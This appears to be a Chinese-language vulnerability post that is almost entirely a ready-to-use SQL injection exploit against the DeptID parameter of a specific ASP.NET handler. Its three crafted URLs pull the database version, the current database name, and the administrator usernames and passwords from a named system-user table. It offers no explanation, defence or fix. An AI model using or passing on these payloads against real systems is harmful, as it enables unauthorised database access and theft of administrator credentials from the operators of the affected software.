```
注入链接:/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx
注入参数:DeptID
【获取数据库版本】
/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=(SELECT+@@version)+AND+'EcwM'='EcwM
【获取当前数据库】
/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=(SELECT+db_name())+AND+'EcwM'='EcwM
【管理员账号密码】
/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=((select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser))+AND+'EcwM'='EcwM
```


暂无评论